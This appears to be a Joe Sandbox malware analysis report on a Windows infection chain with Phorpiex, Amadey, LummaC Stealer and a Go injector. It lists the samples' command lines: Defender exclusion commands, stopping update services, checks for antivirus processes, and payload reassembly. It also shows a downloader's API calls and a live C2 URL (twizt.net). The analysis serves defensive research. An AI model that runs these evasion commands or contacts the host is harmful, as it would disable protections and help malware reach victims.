Path:	C:\Users\user\AppData\Local\Temp\323057790.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\323057790.exe
Imagebase:	0x400000
File size:	98'304 bytes
MD5 hash:	930C41BC0C20865AF61A95BCF0C3B289
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000017.00000002.1958409377.0000000000410000.00000002.00000001.01000000.00000015.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000017.00000003.1947158859.00000000006A8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000017.00000000.1919322254.0000000000410000.00000002.00000001.01000000.00000015.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\AppData\Local\Temp\323057790.exe, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	02:53:21
Start date:	05/10/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xe90000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	02:53:21
Start date:	05/10/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "wrsa opssvc"
Imagebase:	0xaa0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	02:53:23
Start date:	05/10/2024
Path:	C:\Users\user\sysvplervcs.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\sysvplervcs.exe
Imagebase:	0x400000
File size:	98'304 bytes
MD5 hash:	930C41BC0C20865AF61A95BCF0C3B289
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 0000001A.00000002.4201400872.0000000000410000.00000002.00000001.01000000.00000016.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 0000001A.00000000.1947093681.0000000000410000.00000002.00000001.01000000.00000016.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: C:\Users\user\sysvplervcs.exe, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	27
Start time:	02:53:23
Start date:	05/10/2024
Path:	C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):	true
Commandline:	tasklist
Imagebase:	0xe90000
File size:	79'360 bytes
MD5 hash:	0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	02:53:23
Start date:	05/10/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
Imagebase:	0xaa0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	02:53:25
Start date:	05/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c md 400445
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	02:53:25
Start date:	05/10/2024
Path:	C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):	true
Commandline:	findstr /V "navyfurthermoreacceptableinvestigator" Profession
Imagebase:	0xaa0000
File size:	29'696 bytes
MD5 hash:	F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	02:53:25
Start date:	05/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /c copy /b ..\Atmospheric + ..\Commons + ..\Represent + ..\Humans + ..\Href + ..\Router + ..\Connection + ..\Sol O
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	02:53:25
Start date:	05/10/2024
Path:	C:\Users\user\AppData\Local\Temp\400445\Batch.pif
Wow64 process (32bit):	true
Commandline:	Batch.pif O
Imagebase:	0xf90000
File size:	893'608 bytes
MD5 hash:	18CE19B57F43CE0A5AF149C96AECC685
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 5%, ReversingLabs
Has exited:	false

Show Windows behavior

Target ID:	33
Start time:	02:53:25
Start date:	05/10/2024
Path:	C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit):	true
Commandline:	choice /d y /t 5
Imagebase:	0xfb0000
File size:	28'160 bytes
MD5 hash:	FCE0E41C87DC4ABBE976998AD26C27E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	34
Start time:	02:53:26
Start date:	05/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	02:53:26
Start date:	05/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	02:53:26
Start date:	05/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop DoSvc & sc stop BITS /wait
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	02:53:26
Start date:	05/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	02:53:26
Start date:	05/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -Command "Add-MpPreference -ExclusionPath $env:windir; Add-MpPreference -ExclusionPath $env:TEMP; Add-MpPreference -ExclusionPath $env:USERPROFILE"
Imagebase:	0xa40000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	02:53:26
Start date:	05/10/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	sc stop UsoSvc
Imagebase:	0xa0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	02:53:26
Start date:	05/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase:	0x810000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000028.00000002.4200675181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Has exited:	false

Show Windows behavior

Target ID:	41
Start time:	02:53:26
Start date:	05/10/2024
Path:	C:\Windows\sysvplervcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\sysvplervcs.exe"
Imagebase:	0x400000
File size:	98'304 bytes
MD5 hash:	930C41BC0C20865AF61A95BCF0C3B289
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000029.00000000.1978134558.0000000000410000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000029.00000002.2003396502.0000000000410000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	02:53:26
Start date:	05/10/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0xa0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	02:53:28
Start date:	05/10/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	sc stop wuauserv
Imagebase:	0xa0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	02:53:28
Start date:	05/10/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	sc stop DoSvc
Imagebase:	0xa0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	02:53:29
Start date:	05/10/2024
Path:	C:\Users\user\Desktop\httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\httpjask.powerforxes.shoprevada66af9bdbf0f60_team.exe.exe"
Imagebase:	0x400000
File size:	15'064'064 bytes
MD5 hash:	2F208B17F8BDA673F6B4F0DACF43D1BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 79%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	02:53:29
Start date:	05/10/2024
Path:	C:\Windows\SysWOW64\sc.exe
Wow64 process (32bit):	true
Commandline:	sc stop BITS /wait
Imagebase:	0xa0000
File size:	61'440 bytes
MD5 hash:	D9D7684B8431A0D10D0E76FE9F5FFEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	02:53:36
Start date:	05/10/2024
Path:	C:\Users\user\sysvplervcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\sysvplervcs.exe"
Imagebase:	0x400000
File size:	98'304 bytes
MD5 hash:	930C41BC0C20865AF61A95BCF0C3B289
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000030.00000000.2071621421.0000000000410000.00000002.00000001.01000000.00000016.sdmp, Author: Joe Security Rule: JoeSecurity_Phorpiex_4, Description: Yara detected Phorpiex, Source: 00000030.00000002.2096751492.0000000000410000.00000002.00000001.01000000.00000016.sdmp, Author: Joe Security
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	02:53:36
Start date:	05/10/2024
Path:	C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\httpjask.powerforxes.shoplopsa66dc99a997229_VirtualLibrary.exe.exe"
Imagebase:	0xcf0000
File size:	21'402'624 bytes
MD5 hash:	0BD8936501F04777F9C8684B417B6399
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000031.00000002.3020983924.00000000032A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000031.00000002.3020983924.0000000003160000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000031.00000002.3020983924.0000000003250000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000031.00000002.3020983924.00000000032F0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth
Antivirus matches:	Detection: 79%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	02:53:40
Start date:	05/10/2024
Path:	C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe"
Imagebase:	0x7ff6ffc90000
File size:	22'362'624 bytes
MD5 hash:	EFD6377CF1F3E1EFD885DB9343A9A686
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Yara matches:	Rule: Msfpayloads_msf_9, Description: Metasploit Payloads - file msf.war - contents, Source: 00000032.00000002.2952010686.000000C000648000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000032.00000002.3173981696.00007FF70072D000.00000002.00000001.01000000.0000001A.sdmp, Author: Joe Security Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: 00000032.00000000.2113906593.00007FF70072D000.00000002.00000001.01000000.0000001A.sdmp, Author: Joe Security Rule: JoeSecurity_GoInjector_2, Description: Yara detected Go Injector, Source: C:\Users\user\Desktop\httpmales.mugutu.comyuop66bf353c38733_Grids.exe.exe, Author: Joe Security
Antivirus matches:	Detection: 75%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	02:53:47
Start date:	05/10/2024
Path:	C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\httpjask.powerforxes.shopyuop66f6b9bd7a566_784865439765.exe#ss.exe"
Imagebase:	0x400000
File size:	11'950'592 bytes
MD5 hash:	07FC5B4F3A432B09B0D51F8B00EF05F3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Borland Delphi
Antivirus matches:	Detection: 61%, ReversingLabs
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	02:53:51
Start date:	05/10/2024
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Function 00007FFD9B7F08F8 Relevance: 1.8, Strings: 1, Instructions: 547COMMON

Download Yara Rule

Strings

#CM_^, xrefs: 00007FFD9B7F0DC6, 00007FFD9B7F0E68

Memory Dump Source

Source File: 00000000.00000002.3172105190.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7f0000_bomb.jbxd

Similarity

API ID:
String ID: #CM_^
API String ID: 0-2311673530
Opcode ID: 5c527154e754ed9f7f71ec41807c381675552ac34f56b7b4262a0668bdbee0f7
Instruction ID: 19386cb657c418ed26cb0579b5dfc0db3084650dec19f1594d468dff23b916a8
Opcode Fuzzy Hash: 5c527154e754ed9f7f71ec41807c381675552ac34f56b7b4262a0668bdbee0f7
Instruction Fuzzy Hash: 9A02C330F18A4D4FE799EF388464A7977E2EF99704F5141B9D01DC73EADE28A8428742

Function 00007FFD9B7F035D Relevance: 1.6, Strings: 1, Instructions: 357COMMON

Download Yara Rule

Strings

x6u?, xrefs: 00007FFD9B7F243C

Memory Dump Source

Source File: 00000000.00000002.3172105190.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7f0000_bomb.jbxd

Similarity

API ID:
String ID: x6u?
API String ID: 0-1258778307
Opcode ID: 8ef2aa404ae91676102b863021daaf183ae6769135495b29197d0da5f4bf68f9
Instruction ID: 205bcb10614c4b2f9af7d8db3afbbd6f11a902c3a323a14908849298f63d5f69
Opcode Fuzzy Hash: 8ef2aa404ae91676102b863021daaf183ae6769135495b29197d0da5f4bf68f9
Instruction Fuzzy Hash: 33B16921F0EA8E4FEB95EF6884705B43BD1EF5A30475941BAD45CC72E7DD24AD028385

Function 00007FFD9B7F041D Relevance: 1.6, Strings: 1, Instructions: 309COMMON

Download Yara Rule

Strings

x6u?, xrefs: 00007FFD9B7F243C

Memory Dump Source

Source File: 00000000.00000002.3172105190.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7f0000_bomb.jbxd

Similarity

API ID:
String ID: x6u?
API String ID: 0-1258778307
Opcode ID: cf567d475c100356fe45bf69db30c9527dac7ecebc1676c85220712abfcad48a
Instruction ID: 3b9aa0e9896e005b54f6a5bd20a95c205bc64dc834ef648e02b17fa54f8f7a06
Opcode Fuzzy Hash: cf567d475c100356fe45bf69db30c9527dac7ecebc1676c85220712abfcad48a
Instruction Fuzzy Hash: 7C914621F0DA8D4FDB95EF3884A05B93BD1EF9A30475941BAE45DCB2E7DD24AC028381

Function 00007FFD9B7F0868 Relevance: 1.3, Strings: 1, Instructions: 55COMMON

Download Yara Rule

Strings

#CM_^, xrefs: 00007FFD9B7F08D2

Memory Dump Source

Source File: 00000000.00000002.3172105190.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7f0000_bomb.jbxd

Similarity

API ID:
String ID: #CM_^
API String ID: 0-2311673530
Opcode ID: 1fd6be063b96e9c4e3f39935356ac4ee9b242a4b47feba5a78f0a22273220e1b
Instruction ID: 3f109b772dff8095dbc0b071fd235f359b729295b6f8952fb76e10b43c31fd6a
Opcode Fuzzy Hash: 1fd6be063b96e9c4e3f39935356ac4ee9b242a4b47feba5a78f0a22273220e1b
Instruction Fuzzy Hash: 4701D2A1F0EB890FE7695BB844352A83F91FF91740F4501BBE408962F3DE18690583C1

Function 00007FFD9B7F26FA Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3172105190.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7f0000_bomb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1631c00d639ddb5f39315b8bb39ab2be2ea9fc010d3842ec4c2250799abcd089
Instruction ID: 55245ad1a1bd95d01a0991c4ed646f54e9c48341b184079309504056f825b8e6
Opcode Fuzzy Hash: 1631c00d639ddb5f39315b8bb39ab2be2ea9fc010d3842ec4c2250799abcd089
Instruction Fuzzy Hash: 49414B23F0D6A606E715B6FC74258EC36909F90739F5A83B2E16D890E7DC18748105EA

Function 00007FFD9B7F2798 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3172105190.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7f0000_bomb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 89f3179391e06c26dd373e9481ca84b0190e1be15ecb6693b577befff717e5a2
Instruction ID: aaebe300b412af7e71811e8acbe7510208f8741f182620e20def3b4b517bef5f
Opcode Fuzzy Hash: 89f3179391e06c26dd373e9481ca84b0190e1be15ecb6693b577befff717e5a2
Instruction Fuzzy Hash: 5D212817F0E29A06EB15B1EC74315FC3B509F90729F9A43B1E21C850F79C0C644105F5

Function 00007FFD9B7F2C40 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3172105190.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7f0000_bomb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d26ddfed4241711ab91e9ee947831494b4a59a6ab6a338cf3956d15566417fd
Instruction ID: 179adb9b45a1412bc1c52c4d388f47fc3941d190ee9b297c3589f280a37e2cf4
Opcode Fuzzy Hash: 5d26ddfed4241711ab91e9ee947831494b4a59a6ab6a338cf3956d15566417fd
Instruction Fuzzy Hash: E0E06DA141F3D00ED716577448265997FA0AF43204F8906EEE4C9CB0F3C66C5649C353

Function 00007FFD9B7F255E Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.3172105190.00007FFD9B7F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B7F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ffd9b7f0000_bomb.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd59db2d9315a9d10b0bcfe1664a929adfa3bc35c3b58ddc24e87aabb9b26661
Instruction ID: e7844e741e3a79d5085d430ed2ba689dbd4e067e50954bbd6e910029be3711a2
Opcode Fuzzy Hash: fd59db2d9315a9d10b0bcfe1664a929adfa3bc35c3b58ddc24e87aabb9b26661
Instruction Fuzzy Hash: 6DD0C23124590C5BCA08BA96AC408D7379CF688328B000327E41CC2080D62592758390

Analysis Process: http185.215.113.66pei.exe.exePID: 6608, Parent PID: 6936COMMON

Execution Graph

Execution Coverage:	37.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	26.6%
Total number of Nodes:	94
Total number of Limit Nodes:	4

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00841080 Relevance: 59.7, APIs: 28, Strings: 6, Instructions: 187
filenetworksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTickCount.KERNEL32 ref: 00841089
srand.MSVCR90 ref: 00841090
ExpandEnvironmentStringsW.KERNEL32 ref: 008410AF
rand.MSVCR90 ref: 008410B5
rand.MSVCR90 ref: 008410C9
wsprintfW.USER32 ref: 008410F5
InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00841107
InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0084112D
CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000,?,?,?,%temp%,?,00000104), ref: 00841151
InternetReadFile.WININET(00000000,?,00000103,?), ref: 0084117B
WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,?,?,%temp%,?,00000104), ref: 008411A0
InternetReadFile.WININET(00000000,?,00000103,?), ref: 008411B5
CloseHandle.KERNEL32(00000000,?,?,?,%temp%,?,00000104), ref: 008411C2
Sleep.KERNELBASE(000003E8,?,?,?,%temp%,?,00000104), ref: 008411D3
wsprintfW.USER32 ref: 008411E7
DeleteFileW.KERNELBASE(?,?,?,?,?,?,%temp%,?,00000104), ref: 008411F4
Sleep.KERNELBASE(000003E8,?,?,?,?,?,%temp%,?,00000104), ref: 008411FF
CloseHandle.KERNEL32(00000000,?,?,?,%temp%,?,00000104), ref: 0084121B
InternetCloseHandle.WININET(00000000), ref: 00841222
InternetCloseHandle.WININET(00000000), ref: 0084122A
Sleep.KERNEL32(000003E8,?,?,%temp%,?,00000104), ref: 0084123B
rand.MSVCR90 ref: 00841248
rand.MSVCR90 ref: 0084125C
wsprintfW.USER32 ref: 00841282
URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0084129A
wsprintfW.USER32 ref: 008412B5
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,%temp%,?,00000104), ref: 008412C2
Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,%temp%,?,00000104), ref: 008412CD

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, xrefs: 00841102
%s\%d%d.exe, xrefs: 0084127C
%temp%, xrefs: 008410A5
%s:Zone.Identifier, xrefs: 008411E1
%s:Zone.Identifier, xrefs: 008412AF
%s\%d%d.exe, xrefs: 008410EF

Memory Dump Source

Source File: 00000003.00000002.1964569084.0000000000841000.00000020.00000001.01000000.00000006.sdmp, Offset: 00840000, based on PE: true

Associated: 00000003.00000002.1964522748.0000000000840000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1964599121.0000000000842000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1964631353.0000000000844000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_840000_http185.jbxd

Similarity

API ID: File$Internet$CloseHandleSleeprandwsprintf$DeleteOpenRead$CountCreateDownloadEnvironmentExpandStringsTickWritesrand
String ID: %s:Zone.Identifier$%s:Zone.Identifier$%s\%d%d.exe$%s\%d%d.exe$%temp%$Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
API String ID: 1584605378-1161929716
Opcode ID: 02e7d479d0519959dc4718cc165455a8f9e58c4e6575b1c26388e2ba46155fe8
Instruction ID: 612f74e7e9d32ad8b1d2bfa650f5aedcaa87b5421422215018254cffb0db7ede
Opcode Fuzzy Hash: 02e7d479d0519959dc4718cc165455a8f9e58c4e6575b1c26388e2ba46155fe8
Instruction Fuzzy Hash: 8351C675548344ABE320E754DC86FAB77ADFBC8701F404519F649D21C0EAB8E644C776

Function 008412F0 Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 36
networksleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenA.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36,00000000,00000000,00000000,00000000), ref: 00841300
InternetOpenUrlA.WININET(00000000,http://twizt.net/peinstall.php,00000000,00000000,00000000,00000000), ref: 00841327
Sleep.KERNELBASE(000003E8), ref: 00841334
InternetCloseHandle.WININET(00000000), ref: 00841337
Sleep.KERNELBASE(000003E8), ref: 0084133F
InternetCloseHandle.WININET(00000000), ref: 00841342

Strings

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36, xrefs: 008412FB
http://twizt.net/peinstall.php, xrefs: 00841321

Memory Dump Source

Source File: 00000003.00000002.1964569084.0000000000841000.00000020.00000001.01000000.00000006.sdmp, Offset: 00840000, based on PE: true

Associated: 00000003.00000002.1964522748.0000000000840000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1964599121.0000000000842000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000003.00000002.1964631353.0000000000844000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

